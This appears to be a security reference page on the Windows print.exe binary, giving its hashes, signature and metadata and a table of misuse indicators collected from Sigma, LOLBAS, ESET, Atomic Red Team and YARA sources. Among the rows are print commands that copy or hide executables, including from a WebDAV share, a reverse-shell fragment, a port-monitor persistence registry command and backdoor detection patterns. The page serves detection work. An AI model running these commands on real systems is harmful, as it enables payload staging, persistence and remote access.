print.exe

  • File Path: C:\WINDOWS\SysWOW64\print.exe
  • Description: Print Utility

Hashes

Type Hash
MD5 5E725A5CB5FFDEE7557B57DCA71D8A13
SHA1 5D613386D49B39B37212C52BAE0E7A5CB11714B8
SHA256 DFA124AE202A2A3F758CD4B9FDB5EEB2EEAEE0F7827FE81675524DA93176E7E8
SHA384 58F2C30AED7A93FBDC40BBBB960BE265B1A7BFB7A57EB1F4EC0787E74E74242EEED007AC5EA7FC185E318334825D0498
SHA512 3E7BEC0462FC5C5661911BDD95BD1175DD72527C91832276F2D4C79E884CBDE8F16730780C842DAD6AF2C1D0374E3D3C0AAE609B1DE485FEB74436B823A1BA47
SSDEEP 192:R6/s6GrBaX6BWOaFZZyftKlcG1jv/kecPliZLliVYgabSgBk1WMUWen:4/3sBaXMN6nkeWloLlYaK1WMUWk
IMP EC8AF21EA60135BB82EBEBEAF1752064
PESHA1 8B82BD59D8E3AA41454ACA04A5310A491A9C4FC2
PE256 82038B8BF7525FC3643BFBB6DAD42D7CCF5DC640A0FDE9EB2D15E618115E898C

Runtime Data

Usage (stdout):

Prints a text file.

PRINT [/D:device] [[drive:][path]filename[...]]

   /D:device   Specifies a print device.

Loaded Modules:

Path
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\wow64.dll
C:\WINDOWS\System32\wow64base.dll
C:\WINDOWS\System32\wow64con.dll
C:\WINDOWS\System32\wow64cpu.dll
C:\WINDOWS\System32\wow64win.dll
C:\WINDOWS\SysWOW64\print.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: Print.Exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/dfa124ae202a2a3f758cd4b9fdb5eeb2eeaee0f7827fe81675524da93176e7e8/detection

Possible Misuse

The following table contains possible examples of print.exe being misused. While print.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma av_printernightmare_cve_2021_34527.yml description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 . DRL 1.0
sigma lnx_shell_susp_rev_shells.yml - ';while(cmd=c.gets);IO.popen(cmd,"r"){\|io\|c.print' DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml title: Possible PrintNightmare Print Driver Install DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml title: Possible CVE-2021-1675 Print Spooler Exploitation DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml description: Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler.yml - 'The print spooler failed to load a plug-in module' DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_operational.yml title: CVE-2021-1675 Print Spooler Exploitation DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_operational.yml description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_security.yml title: CVE-2021-1675 Print Spooler Exploitation IPC Access DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_security.yml description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 DRL 1.0
sigma file_event_win_cve_2021_1675_printspooler.yml title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern DRL 1.0
sigma file_event_win_cve_2021_1675_printspooler.yml description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 DRL 1.0
sigma proc_creation_win_susp_print.yml title: Abusing Print Executable DRL 1.0
sigma proc_creation_win_susp_print.yml description: Attackers can use print.exe for remote file copy DRL 1.0
sigma proc_creation_win_susp_print.yml - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Print.yml DRL 1.0
sigma proc_creation_win_susp_print.yml - \print.exe DRL 1.0
sigma proc_creation_win_susp_print.yml - print DRL 1.0
sigma proc_creation_win_susp_print.yml - print.exe DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml description: Detects suspicious print spool service (spoolsv.exe) child processes. DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md DRL 1.0
sigma registry_event_add_port_monitor.yml TargetObject\|startswith: 'HKLM\System\CurrentControlSet\Control\Print\Monitors\' DRL 1.0
sigma registry_event_add_port_monitor.yml TargetObject\|contains: '\System\CurrentControlSet\Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver' DRL 1.0
sigma registry_event_asep_reg_keys_modification.yml - '\Print\Providers' DRL 1.0
sigma registry_event_asep_reg_keys_modification.yml - '\Print\Monitors' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml - '\Print\Providers' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml - '\Print\Monitors' DRL 1.0
sigma registry_event_asep_reg_keys_modification_currentcontrolset.yml TargetObject\|contains: '\Print\Monitors\CutePDF Writer Monitor' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows x64\Drivers\Version-3\QMS 810\' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows x64\Drivers\Version-3\mimikatz' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments\Windows' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\Control\Print\Environments' DRL 1.0
sigma registry_event_mimikatz_printernightmare.yml - '\CurrentVersion\Print\Printers' DRL 1.0
sigma registry_event_susp_printer_driver.yml - '\Control\Print\Environments\Windows x64\Drivers' DRL 1.0
LOLBAS Print.yml Name: Print.exe  
LOLBAS Print.yml - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe  
LOLBAS Print.yml - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe  
LOLBAS Print.yml - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe  
LOLBAS Print.yml - Path: C:\Windows\System32\print.exe  
LOLBAS Print.yml - Path: C:\Windows\SysWOW64\print.exe  
LOLBAS Print.yml - IOC: Print.exe retrieving files from internet  
LOLBAS Print.yml - IOC: Print.exe creating executable files on disk  
LOLBAS Mshtml.yml Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).  
malware-ioc deprimon https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/[WeLiveSecurity]. © ESET 2014-2018
malware-ioc deprimon [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors\Windows Default Print Monitor] © ESET 2014-2018
malware-ioc nouns.txt print © ESET 2014-2018
malware-ioc mumblehard under the Perl interpreter. The following command ran as root will print the © ESET 2014-2018
malware-ioc mumblehard ps -ef \| grep -e ' httpd$' -e ' mail$' -e ' init$' \| awk '{print $2}' \| xargs -I '{}' ls -l '/proc/{}/exe' \| grep perl \| cut -d/ -f 3 © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_6d67d\Driver © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\BcastDVRUserService_3c628o\Driver © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{94E5H6D48A-P895-85E1-54DD-080636B11A03} © ESET 2014-2018
malware-ioc 2020_Q4 HKLM\SOFTWARE\Microsoft\Print\Components\Spooler-PPC\{38C8D238Q-923C-D782-9B8J-829263CD85C9} © ESET 2014-2018
malware-ioc vf_ioc_linux_rakos.py print("Suspected PID: {0:8s} {1:<16}:{2:>5} {3:<16}:{4:>5} {5:<15s} {6:>17s}/{7:<5d}\n".format(proto, saddr, sport, daddr, dport, state, task.comm, task.pid)) © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_ : "; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "$f : crypted, skip\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print $fc. "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_ssh: \n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd1: '$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc1: '$sc[1]':'$sc[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd1a: file:'$sd[4]'; hash:'$sd[15]'; cvs:'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd2: '$sd[1]':'$sd[2]':'$sd[3]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc4: '$sc[1]':'$sc[0]'\n" if @sc and f $sc[1]; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd4: '$sd[0]':'$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd5: " . join( '\|', @sd ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd6: '$sd[2]':'$sd[0]'\nmod_sshc6: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd7: '$sd[0]':'$sd[4]'\nmod_sshc7: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd8: '$sd[1]':'$sd[2]'\nmod_sshc8: '$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sd) { print "mod_sshd12: GET, no params"; ssh_ls() } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc14: hash:'$sd[3]':'$sd[4]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl else { print "mod_sshd14: unknown hash; fpass:'$sd[1]';'$sd[3]'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod14p: $d\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd15: '$sd[0]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc15: '$sc[38]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd16: '$sd[0]':'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc16: '$sc[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd17: crypt:'$sd[2]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc17: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd17: client_string:'$q[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd18: md5:'$sd[3]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc18: md5:'$sc[3]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd19: '$sd[0]':'$sd[1]' url:'$sd[5] '$sd[4]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd20: '$sd[0]':'$sd[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc20: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd21: '$sd[0]' mod_sshc21: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc22: '$sd[0]':'$sd[1]':'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd23: '$sd[2]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc23: '$sc[0]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd24: '$sd[0]':'$sd[17]':'$sd[18]:$sd[20]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc24: '$sc[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd25: '$sd[2]':'$sd[0]' mod_sshc25: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd27: '$sd[0]':'$sd[2]':'$sd[1]'\nmod_sshc27: '$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd31: hash:'$sd[2]':'$sd[1]':'$sd[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd32: md5:'$sd1[0]:'$sd[0]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd33: '$sd[0]':'$sd[1]':'$sc[0]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print $q. "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd36: md5:'$sd[0]':'$sc[0]'; '$sd[1]':'$sc[1]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd37: md5:'$sd[0]'; '$sd[1]':'$sd[3]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl while (<$fn>) { chomp; print $_ ^ "\x14" x length $_ } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_ssh41_cstr: " . join( '\|', sort keys %ostr ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd41: '$sd[1]' '$sd[0]', crypted\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc41: '$sc[1]' '$sc[0]', crypted\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd42: detected; log_useragent:passwd_file:passwd\n" if @sd; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshc42: detected\n" if @sc; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd44: pass:'$sd[1]' '$sd[0]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if ( $sc[0] ) { print "mod_sshc44: '$sc[0]' '$sc[13]'\n"; ssh_ls( $sd[0] ) } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd45: pass:'$sd[1]' host:'$sd[0]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if ( $sc[0] ) { print "mod_sshc45: host:'$sc[0]' '$sc[1]'\n"; ssh_ls() } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd46: crypt:'$sc[1]' v1:'$sd[1]' v2:'$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_sshd47: pass:'$sd[0]' '$sd[1]', '$sd[2]'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sc) { print "mod_sshc47: host:'$sc[0]' '$sc[-1]'\n"; ssh_ls( $sc[0] ) } © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sd) { print "mod_md5_sshd: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sc) { print "mod_md5_ssh: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_md5_static_ssl: $static_ssl\n" if $static_ssl; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_hack_strd: possible hacked, " . join( "\|", @sd ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_hack_strc: possible hacked, " . join( "\|", @sc ) . "\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl for (@sd) { print "mod_md5_sshd1: '$_'\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_sshd_str: '" . join( "':'", keys %ostr ) . "'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl print "mod_str_sshd_str1: '" . join( "':'", keys %ostr ) . "'\n"; © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sd) { print "sshd_str: " . join( '\|', @sd ) . "\n" } © ESET 2014-2018
malware-ioc windigo_signatures.pl if (@sc) { print "sshc_str: " . join( '\|', @sc ) . "\n" } © ESET 2014-2018
malware-ioc turla ** ResultQueue::print``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc turla ** TaskQueue::print``{:.highlight .language-cmhg} © ESET 2014-2018
malware-ioc windigo print the dynamic section of the ELF header. Anything NEEDED (type 1) other © ESET 2014-2018
malware-ioc windigo OpenSSH version 6.7 or earlier. A clean server will print © ESET 2014-2018
malware-ioc windigo to stderr but an infected server will only print the usage (note the missing © ESET 2014-2018
malware-ioc windigo yields no output if one is not infected and would print a filename if one is. © ESET 2014-2018
malware-ioc windigo ps -ef \| grep crond \| grep -v grep \| awk '{print $2}' © ESET 2014-2018
malware-ioc winnti_group HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = DEment.dll © ESET 2014-2018
malware-ioc winnti_group HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = EntAppsvc.dll © ESET 2014-2018
malware-ioc winnti_group HKLM\SOFTWARE\Microsoft\Print\Components\DC20FD7E-4B1B-4B88-8172-61F0BED7D9E8 © ESET 2014-2018
malware-ioc winnti_group HKLM\SOFTWARE\Microsoft\Print\Components\A66F35-4164-45FF-9CB4-69ACAA10E52D © ESET 2014-2018
atomic-red-team index.md - T1547.012 Print Processors CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1547.012 Print Processors CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Outlook Forms CONTRIBUTE A TEST | Print Processors CONTRIBUTE A TEST | Impair Defenses CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | Print Processors CONTRIBUTE A TEST | Services File Permissions Weakness CONTRIBUTE A TEST | Masquerade Task or Service | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Password Filter DLL | Print Processors CONTRIBUTE A TEST | Indicator Removal from Tools CONTRIBUTE A TEST | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Print Processors CONTRIBUTE A TEST | Security Support Provider | Mark-of-the-Web Bypass | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1016.md if [ -x “$(command -v netstat)” ]; then netstat -ant | awk ‘{print $NF}’ | grep -v ‘[a-z]’ | sort | uniq -c; else echo “netstat is missing from the machine. skipping…”; fi; MIT License. © 2018 Red Canary
atomic-red-team T1018.md Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled. MIT License. © 2018 Red Canary
atomic-red-team T1018.md adidnsdump -u #{user_name} -p #{acct_pass} –print-zones #{host_name} MIT License. © 2018 Red Canary
atomic-red-team T1027.004.md Upon execution, the exe will print ‘T1027.004 Dynamic Compile’. MIT License. © 2018 Red Canary
atomic-red-team T1036.006.md 1. echo ‘#!/bin/bash\necho “print "hello, world!"” | /usr/bin/python\nexit’ > execute.txt && chmod +x execute.txt MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md - Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md ## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md It is designed to mimic BlackByte ransomware’s print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md | max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75| MIT License. © 2018 Red Canary
atomic-red-team T1059.003.md ##### Description: File to print must exist on disk at specified location (#{file_to_print}) MIT License. © 2018 Red Canary
atomic-red-team T1082.md in order simply print the recon results to the screen as opposed to exfiltrating them. Script. MIT License. © 2018 Red Canary
atomic-red-team T1083.md cd $HOME && find . -print | sed -e ‘s;[^/]*/;|;g;s;|; |;g’ > #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1110.003.md This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like “[*] username:password”, whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. MIT License. © 2018 Red Canary
atomic-red-team T1127.001.md Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print “Hello From a Code Fragment” and “Hello From a Class.” to the screen. MIT License. © 2018 Red Canary
atomic-red-team T1127.001.md Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print “Hello from a Visual Basic inline task!” to the screen. MIT License. © 2018 Red Canary
atomic-red-team T1140.md | message | Message to print to the screen | String | Hello from Atomic Red Team test T1140!| MIT License. © 2018 Red Canary
atomic-red-team T1140.md ENCODED=$(python3 -c ‘import base64;enc=base64.b64encode(“#{message}”.encode());print(enc.decode())’) MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c “import base64;dec=base64.b64decode("$ENCODED");print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c “import base64 as d;dec=d.b64decode("$ENCODED");print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c “from base64 import b64decode;dec=b64decode("$ENCODED");print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md python3 -c “from base64 import b64decode as d;dec=d("$ENCODED");print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED | python3 -c “import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED > #{encoded_file} && python3 -c “import base64;dec=base64.b64decode(open(‘#{encoded_file}’).read());print(dec.decode())” MIT License. © 2018 Red Canary
atomic-red-team T1140.md ENCODED=$(perl -e “use MIME::Base64;print(encode_base64(‘#{message}’));”) MIT License. © 2018 Red Canary
atomic-red-team T1140.md perl -le “use MIME::Base64;print(decode_base64(‘$ENCODED’));” MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED | perl -le ‘use MIME::Base64;print(decode_base64());' MIT License. © 2018 Red Canary
atomic-red-team T1140.md echo $ENCODED > #{encoded_file} && perl -le ‘use MIME::Base64;open($f,”<”,”#{encoded_file}”);print(decode_base64(<$f>));’ MIT License. © 2018 Red Canary
atomic-red-team T1485.md dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ‘{print $5}’) iflag=count_bytes MIT License. © 2018 Red Canary
atomic-red-team T1489.md Stops a specified service using the net.exe command. Upon execution, if the service was running “The Print Spooler service was stopped successfully.” MIT License. © 2018 Red Canary
atomic-red-team T1489.md will be displayed. If the service was not running, “The Print Spooler service is not started.” will be displayed and it can be MIT License. © 2018 Red Canary
atomic-red-team T1518.md /usr/libexec/PlistBuddy -c “print :CFBundleShortVersionString” /Applications/Safari.app/Contents/Info.plist MIT License. © 2018 Red Canary
atomic-red-team T1518.md /usr/libexec/PlistBuddy -c “print :CFBundleVersion” /Applications/Safari.app/Contents/Info.plist MIT License. © 2018 Red Canary
atomic-red-team T1546.001.md * HKEY_CLASSES_ROOT\txtfile\shell\print\command MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md <blockquote>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md reg add “hklm\system\currentcontrolset\control\print\monitors\ART” /v “Atomic Red Team” /d “#{monitor_dll}” /t REG_SZ MIT License. © 2018 Red Canary
atomic-red-team T1547.010.md reg delete “hklm\system\currentcontrolset\control\print\monitors\ART” /f >nul 2>&1 MIT License. © 2018 Red Canary
atomic-red-team T1562.004.md Print the last 10 lines of the Uncomplicated Firewall (UFW) log file MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe MIT License. © 2018 Red Canary
signature-base apt_backdoor_ssh_python.yar $s1 = “print ‘[-] (Failed to load moduli – gex will be unsupported.)’” fullword ascii CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar $s2 = “print ‘[-] Listen/bind/accept failed: ‘ + str(e)” fullword ascii CC BY-NC 4.0
signature-base apt_backdoor_ssh_python.yar $s4 = “print ‘[-] SSH negotiation failed.’” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $x2 = “print "Gimme hex: ";” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s3 = “print "$hex in decimal=$dec\n\n";” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s2 = “print "ERROR: the filename or hex representation needs to be one argument try using \"’s\n";” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s5 = “print hextoIP($ARGV[0]);” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s2 = “print »out, "%s%04x " % (lead,i),” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s3 = “print »out, "%02X" % ord(x[i+j]),” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s4 = “print »out, sane(x[i:i+16])” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s1 = “print "[+] Connecting to %s:%s" % (self.params.dst[‘ip’], self.params.dst[‘port’])” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s6 = “print "[-] keyboard interrupt before response received"” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp.yar $s8 = “print ‘Debug info ‘,’=’*40” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $s2 = “print "java -jar jscanner.jar$scanth$list\n";” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x1 = “print ‘ -s storebin use storebin as the Store executable\n’” fullword ascii CC BY-NC 4.0
signature-base apt_eqgrp_apr17.yar $x3 = “print ‘ -k keyfile the key text file to inject’” fullword ascii CC BY-NC 4.0
signature-base apt_op_wocao.yar $a = “out.print("All seems fine.");” CC BY-NC 4.0
signature-base apt_op_wocao.yar $e = “out.print((char)c);}in.close()” CC BY-NC 4.0
signature-base apt_op_wocao.yar $f = “out.print((char)c);}er.close()” CC BY-NC 4.0
signature-base apt_project_sauron_extras.yar $s2 = “Print only replying Ips” CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s3 = /if[\x09\x20]{0,32}(CGI::param([\x22\x27]\w{1,64}[\x22\x27]))\s{0,128}{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\n\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my $\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param([\x22\x27]\w{1,64}[\x22\x27])[\x09\x20]{0,32};\s{0,128}system([\x22\x27]$/ CC BY-NC 4.0
signature-base apt_pulsesecure.yar $s4 = /sed -i [^\r\n]{1,128}CGI::param([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param([^\r\n]{1,128}system(/ CC BY-NC 4.0
